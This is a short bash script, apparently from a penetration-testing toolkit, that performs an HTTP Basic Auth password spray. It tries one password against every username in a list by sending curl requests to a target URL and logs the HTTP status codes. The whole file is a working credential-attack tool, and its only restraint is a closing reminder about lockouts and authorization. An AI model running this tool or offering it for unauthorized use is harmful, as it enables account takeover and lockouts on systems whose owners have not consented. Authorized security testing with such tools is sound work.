PentestPilot/bin/passwords/spray_http_basic.sh

#!/usr/bin/env bash
set -euo pipefail

usage(){
  cat >&2 <<USAGE
Usage: $(basename "$0") <url> <users.txt> <password>
Performs cautious HTTP Basic Auth spray (one pass).
USAGE
  exit 1
}

url=${1:-}
users=${2:-}
pass=${3:-}
[[ -z "$url" || -z "$users" || -z "$pass" ]] && usage

while IFS= read -r u; do
  [[ -z "$u" ]] && continue
  code=$(curl -sk -o /dev/null -m 6 -w "%{http_code}" -u "$u:$pass" "$url" || true)
  echo "$u\t$code"
  sleep 1
done < "$users"

echo "[+] Note: Respect lockout policies. Use only with authorization."